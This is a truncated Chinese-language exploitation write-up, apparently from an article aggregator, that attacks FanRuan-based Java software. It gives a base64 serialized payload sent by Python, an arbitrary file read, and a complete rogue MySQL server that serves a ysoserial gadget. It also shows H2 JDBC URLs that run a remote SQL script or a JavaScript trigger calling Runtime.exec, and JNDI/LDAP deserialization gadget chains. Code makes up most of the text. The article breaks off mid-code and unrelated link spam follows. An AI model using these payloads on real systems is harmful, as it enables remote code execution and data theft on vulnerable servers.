Qahki88UAXKqH/ph92aC3UmcHiAS+0tMGmkVjjugKXbl4StIKZtIUulV91YuwpMSGNO4YWd92BNBX5ICcehVQGoIicf2Jr52MUY47vRuZYauheGXUz9YYBvXX+gd56ri0nuqqp/ypVVTcBIziM4UdIOI+TpqcFoN+pwe8Ohb734j1cvwcP/O15L/YoyoMbl2J8Oxpw+un8ytuRHn9S/33nVju1iQTyeoI8Fr38impCUlWuZMNwsHr9tSee+OXtv+n3aXh/2LTjtBktjhWAQb9uO71djceucZUcyMq+cOovhU//tFe/Pnxy2yKQ980jr7783dmVz2jeM1vwhpcriKsPhxd4oRE7MGYL2H3Gv7j0pw58H9ilDgvIOrsNWQsb6j4TFzb1h+//6I0K/w4ahG8VCXhlPBKVNUEKpHrwZnT9VZaY+udf7zW9iiTq1SOpAu9EWzN0XU9Gb38O/Ow/P9ggY/thDznSBVns4x4GFTN2vOQ1v1Jk4nOvf/Vw78tvf6lunbIQs/zCB14JMhLZGk1UTw3/5q579mOvqNzqDuYExXq4ip+k5QU0mBYX/ZFBt1FTy1KQ/kgzTjfl2y8knvmEHN+BslBu4qWXxp/6ddWFp4nZlfodc6UGM0US215SDxZuy/bm3ld2HavPCLo3Debe6nrxk8FZ2wklyjs2Kcm5rU7b5sKnA1dNtcaj1f7HH5xKwYhw6ZUf9ixc/N+UPhE6m9wtpWS4W1twVGOP3rN/6ptvzX/vy/d1FHRGuzIxhE6+oPx9IZU6eepcchJ+Tl6Ympo8m1LgiwZcCGG/cCd1DG5aTmnGl6vnJ6ABFAr5mVVqe2xiOzR4ndfvRRahhzA5c/bMmamzkxMUgTj+qbtZ1oFxiM1I4bMJ6EB8lkGjsaAR3A2AUf+E4VXgfMaFN9OUNVYMl8QxnAnswr6Hb7pjjGihmKl5/PnM1OLk86DfCJJyEj8W4nFLnL+nl3mNkqRTcC6bQxtb3V/c6ow2MF472rB855br4nLFrReG5qdNW4qeROzzgzyJZpsbni13V1UFZReWzaGo8gU3juE/fuvb/37h8+fjOY3k0yT8p09Hm/9AIbyr+V9CkiROKt6S+mTV/wPNntrnhRsAAA=="
burp0_data = base64.b64decode(b)
res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
print(res.content.decode("gbk", errors="ignore"))
任意文件读取成功,D:/1.txt内容为1111,
之后进行mysql反序列化时,将jdbc改为:jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_1_1,
然后重新生成base64加密的序列化数据,然后用python发包,不过不能成功,因为mysql组件版本为1.5.49,已经修复了反序列化,
使用其他的脚本来搭建mysql服务端,
# coding=utf-8
import socket
import binascii
import os
greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()
def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def get_payload_content():
#file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload
file= r'payload'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")
else:
print("open false")
#calc
payload_content='aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000005e8cafebabe0000003300340a000800240a002500260800270a002500280700290a0005002a07002b07002c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100124c6f72672f6578616d706c652f43616c633b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e7307002d0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000d537461636b4d61705461626c6507002901000a536f7572636546696c6501000943616c632e6a6176610c0009000a07002e0c002f003001000463616c630c003100320100136a6176612f696f2f494f457863657074696f6e0c0033000a0100106f72672f6578616d706c652f43616c63010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000400010009000a0001000b0000002f00010001000000052ab70001b100000002000c0000000600010000000b000d0000000c000100000005000e000f00000001001000110002000b0000003f0000000300000001b100000002000c00000006000100000016000d00000020000300000001000e000f00000000000100120013000100000001001400150002001600000004000100170001001000180002000b000000490000000400000001b100000002000c00000006000100000019000d0000002a000400000001000e000f000000000001001200130001000000010019001a000200000001001b001c0003001600000004000100170008001d000a0001000b000000610002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050003000c0000001600050000000e00090011000c000f000d001000110012000d0000000c0001000d0004001e001f000000200000000700024c0700210400010022000000020023707400126e616d653535303639313835333834373030707701007871007e000d78'
return payload_content
# 主要逻辑
def run():
while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))
# 1.先发送第一个 问候报文
send_data(conn,greeting_data)
while True:
# 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok
receive_data(conn)
send_data(conn,response_ok_data)
#其他过程
data=receive_data(conn)
#查询一些配置信息,其中会发送自己的 版本号
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
# 为什么我加了EOF Packet 就无法正常运行呢??
# 获取payload
payload_content=get_payload_content()
# 计算payload长度
payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
# 计算数据包长度
data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break
if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3306
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#当socket关闭后,本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)
print("start fake mysql server listening on {}:{}".format(HOST,PORT))
run()mysql组件反序列化依然不成功,说明的确是版本问题,,,
jdbc-h2(h2 rce利用失败,h2 1.4.192无rce漏洞)
参考h2的jdbc利用:
https://m0d9.me/2021/04/26/Jdbc%E7%A2%8E%E7%A2%8E%E5%BF%B5%E4%B8%89%EF%BC%9A%E5%86%85%E5%AD%98%E6%95%B0%E6%8D%AE%E5%BA%93/
package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.swing.UIDefaults;
import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
public class Main {
public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
//Test test = new Test();
//User user = new User(test, "qqq");
DruidXADataSource druidXADataSource = new DruidXADataSource();
List> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
//JSONArray jsonArray_3 = new JSONArray(druidXADataSource);
//new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);
List> list_1 = new ArrayList<>(Arrays.asList(list_3));
List> list_2 = new ArrayList<>(Arrays.asList("1"));
JSONArray jsonArray_1 = new JSONArray(list_1);
JSONArray jsonArray_2 = new JSONArray(list_2);
UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 11);
putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);
//HashSet set = new LinkedHashSet();
//set.add(jsonArray_1);
//set.add(jsonArray_2);
//使用一个无害的InvokerTransformer
//InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
//TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);
//TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
//treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);
//TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
//treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);
Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
statLogger.setAccessible(true);
statLogger.set(druidXADataSource, null);
Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
transactionHistogram.setAccessible(true);
transactionHistogram.set(druidXADataSource, null);
Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
logWriter.setAccessible(true);
logWriter.set(druidXADataSource, null);
Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
initedLatch.setAccessible(true);
initedLatch.set(druidXADataSource, null);
Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
initialSize.setAccessible(true);
initialSize.set(druidXADataSource, 1);
//Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
//driverClass.setAccessible(true);
//driverClass.set(druidXADataSource, "javax.naming.InitialContext");
Field xaconnection = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
xaconnection.setAccessible(true);
//nc.exe -lvvp 6666 查看System.getProperty方法调取对应的value
//xaconnection.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
xaconnection.set(druidXADataSource, "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");
Hashtable搭建1.4.192后发现是版本问题,此版本不能rce,将版本换成1.4.197后能rce
pom.xml
com.h2database
h2
1.4.192
Main.java:
package org.example;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.*;
public class Main {
public static void main(String[] args) throws NotSerializableException, IllegalAccessException, NoSuchFieldException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
String DRIVER_CLASS = "org.h2.Driver";
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'";
Properties info = null;
try {
Class.forName(DRIVER_CLASS);
DriverManager.getDriver(JDBC_URL).connect(JDBC_URL, info);
}catch (ClassNotFoundException | SQLException e) {
e.printStackTrace();
}
}
}
sql.sql的内容:
CREATE TRIGGER poc2 BEFORE SELECT ON
INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec("calc") $$;
或者直接在JDBC_URL上构造js语句:
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
"java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')\n" +
"$$\n";jndi 反序列化 rce(成功)
生成base64加密的序列化数据,准备利用python发包,
package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import oracle.jdbc.rowset.OracleCachedRowSet;
import org.apache.arrow.vector.util.JsonStringArrayList;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.swing.UIDefaults;
import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.sql.SQLException;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
public class Main {
public static void main(String[] args) throws NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, SQLException {
OracleCachedRowSet oracleCachedRowSet_1 = new OracleCachedRowSet();
Field dataSourceName_1 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_1.setAccessible(true);
dataSourceName_1.set(oracleCachedRowSet_1, "ldap://127.0.0.1:4444/dc=example,dc=com");
OracleCachedRowSet oracleCachedRowSet_2 = new OracleCachedRowSet();
Field dataSourceName_2 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_2.setAccessible(true);
dataSourceName_2.set(oracleCachedRowSet_2, "ldap://127.0.0.1:4444/dc=example,dc=com");
JsonStringArrayList jsonStringArrayList_1= new JsonStringArrayList(2);
jsonStringArrayList_1.add(oracleCachedRowSet_1);
JsonStringArrayList jsonStringArrayList_2= new JsonStringArrayList(2);
jsonStringArrayList_2.add(oracleCachedRowSet_2);
UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, 1);
putmethod.invoke(textAndMnemonicHashMap_2, jsonStringArrayList_2, jsonStringArrayList_2);
Vector v_1 = new Vector();
v_1.add(0, "111");
v_1.add(1, "111");
Vector v_2 = new Vector();
v_2.add(0, "222");
v_2.add(1, "222");
String[] strings = new String[1];
strings[0] = "111";
Field metaData = OracleCachedRowSet.class.getDeclaredField("metaData");
metaData.setAccessible(true);
metaData.set(oracleCachedRowSet_1, strings);
metaData.set(oracleCachedRowSet_2, strings);
Field matchColumnNames = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnNames");
matchColumnNames.setAccessible(true);
matchColumnNames.set(oracleCachedRowSet_1, v_1);
matchColumnNames.set(oracleCachedRowSet_2, v_1);
Field matchColumnIndexes = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnIndexes");
matchColumnIndexes.setAccessible(true);
matchColumnIndexes.set(oracleCachedRowSet_1, v_2);
matchColumnIndexes.set(oracleCachedRowSet_2, v_2);
Field monitorLock = OracleCachedRowSet.class.getSuperclass().getDeclaredField("monitorLock");
monitorLock.setAccessible(true);
monitorLock.set(oracleCachedRowSet_1, null);
monitorLock.set(oracleCachedRowSet_2, null);
Hashtablejndi服务端
请到「今天看啥」查看全文
推荐文章
|
|
雨果网 · T86风波之后,大批卖家押注海外货盘 昨天 |
|
|
Java编程精选 · SpringBoot实现分布式验证码登录方案 2 天前 |
|
|
小野说外贸 · 速卖通卖家必看!用好插件选品,轻松找到你的下一款爆品! 2 天前 |
|
|
芋道源码 · 组里有个卷王怎么办?特别喜欢每天晚上十一点发日报,主动抢同事活干,还特别喜欢汇报邀功! 2 天前 |
|
|
虎嗅APP · 哎,锤子应该是卖给小米了 8 年前 |
|
移动互联网资讯 · 中国首富王健林首谈自己人生中最惊心动魄的时刻!(珍藏版) 8 年前 |
|
强国梦 · 让你受益一生的9件小事 7 年前 |
|
健康界 · 都说社会办医春天已至 今天说说究竟怎样推门而入 7 年前 |
|
收获 · 沈从文:学鲁迅 7 年前 |